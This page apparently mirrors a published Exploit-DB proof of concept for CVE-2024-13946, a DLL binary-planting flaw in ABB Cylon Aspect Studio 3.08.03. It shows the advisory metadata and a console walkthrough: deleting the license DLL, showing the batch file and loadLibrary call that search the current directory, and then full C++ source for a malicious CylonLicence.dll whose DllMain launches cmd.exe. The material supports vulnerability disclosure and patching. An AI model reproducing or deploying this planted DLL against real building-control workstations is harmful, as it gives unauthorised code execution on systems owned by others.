ABB Cylon Aspect Studio 3.08.03 – Binary Planting

Exploit Details

Basic Information

Exploit Title	ABB Cylon Aspect Studio 3.08.03 – Binary Planting
Exploit ID	EDB-ID:52306
Type	exploitdb
Published	2025-05-25T00:00:00
Modified	2025-05-25T00:00:00

CVSS Information

CVSS Score	7.1
Severity	HIGH
Vector	CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/SC:H/VI:L/SI:L/VA:L/SA:L

CVE Information

CVE-2024-13946

Exploit Description

Exploit Title: ABB Cylon Aspect Studio 3.08.03 – Binary Planting Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: <=3.08.03 Tested…

Exploit Code

# Exploit Title: ABB Cylon Aspect Studio 3.08.03 – Binary Planting

# Vendor: ABB Ltd.

# Product web page: https://www.global.abb

# Affected version: <=3.08.03

# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7

# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic @zeroscience
# Advisory ID: ZSL-2025-5952

# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php
# CVE ID: CVE-2024-13946

# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946
C:\> type project
                 P   R   O   J   E   C   T
                        .|

                        | |

                        |’|            ._____

                ___    |  |            |.   |’ .—“|

        _    .-‘   ‘-. |  |     .–‘|  ||   | _|    |

     .-‘|  _.|  |    ||   ‘-__  |   |  |    ||      |

     |’ | |.    |    ||       | |   |  |    ||      |

 ____|  ‘-‘     ‘    “”       ‘-‘   ‘-.’    ‘`      |____

░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░

         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░

         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░

         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll

C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat

REM 64bit parameters

jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding=”UTF-8″ -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat
C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters
C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding=”UTF-8″ -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class

…

…

System.loadLibrary(“CylonLicence”);

} catch (Throwable t) {}

LoggerUtil.logger.error(“Error loading license DLL”, t);

}

}

…

…
C:\Aspect\Aspect-Studio-3.08.03> cd logs

C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log
ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]

java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path

  at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)

  at java.lang.Runtime.loadLibrary0(Runtime.java:870)

  at java.lang.System.loadLibrary(System.java:1122)

  at com.aamatrix.util.AspectStudio.(AspectStudio.java:42)

  at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18)

  at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38)

  at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34)

  at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52)

  at java.lang.Class.forName0(Native Method)

  at java.lang.Class.forName(Class.java:348)

  at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)

  …

  …
C:\DLL-Mala> type CylonLicence.cpp
#define WIN32_LEAN_AND_MEAN

#include 

#include 
extern “C” __declspec(dllexport)

DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {

    ShellExecuteW(NULL, L”open”, L”cmd.exe”, L”/c start”, NULL, SW_SHOWNORMAL);

    return 0;

}
extern “C” __declspec(dllexport)

BOOL APIENTRY DllMain(HMODULE hModule,

    DWORD ul_reason_for_call,

    LPVOID lpReserved) {

    switch (ul_reason_for_call) {

    case DLL_PROCESS_ATTACH:

        CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);

        break;

    case DLL_THREAD_ATTACH:

    case DLL_THREAD_DETACH:

    case DLL_PROCESS_DETACH:

        break;

    }

    return TRUE;

}

View Full Exploit Details

Exploit Details

Basic Information

CVSS Information

CVE Information

Exploit Description

Exploit Code

💭 Join the Security Discussion ❌ Cancel Reply